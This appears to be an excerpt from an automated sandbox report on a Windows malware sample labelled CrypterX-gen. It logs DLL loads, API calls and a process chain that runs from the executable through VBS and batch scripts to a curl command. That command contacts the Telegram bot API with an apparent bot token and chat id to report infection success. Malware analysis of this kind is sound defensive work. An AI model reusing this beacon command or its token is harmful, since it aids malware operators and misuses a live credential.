Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Windows\System32\curl.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs" |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" " |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success" |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329A438 FindClose,abort,FindFirstFileExW,GetLastError, |
0_2_00007FF7B329A438 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329A4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, |
0_2_00007FF7B329A4AC |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ADADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, |
4_2_00007FF7B0ADADF0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AC40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, |
4_2_00007FF7B0AC40CC |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AEF900 FindFirstFileExA, |
4_2_00007FF7B0AEF900 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329B2E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00007FF7B329B2E0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329B798 SetUnhandledExceptionFilter, |
0_2_00007FF7B329B798 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B329B5B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00007FF7B329B5B8 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE2170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
4_2_00007FF7B0AE2170 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE7338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
4_2_00007FF7B0AE7338 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE2DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
4_2_00007FF7B0AE2DD0 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0AE2FB4 SetUnhandledExceptionFilter, |
4_2_00007FF7B0AE2FB4 |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Code function: 4_2_00007FF7B0ADADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, |
4_2_00007FF7B0ADADF0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B3292524 socket,memset,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, |
0_2_00007FF7B3292524 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe |
Code function: 0_2_00007FF7B327BBA0 memset,strlen,memset,strlen,strncmp,strlen,strlen,strncmp,strlen,inet_pton,htons,inet_pton,htons,htons,bind,htons,bind,memset,getsockname,WSAGetLastError,WSAGetLastError, |
0_2_00007FF7B327BBA0 |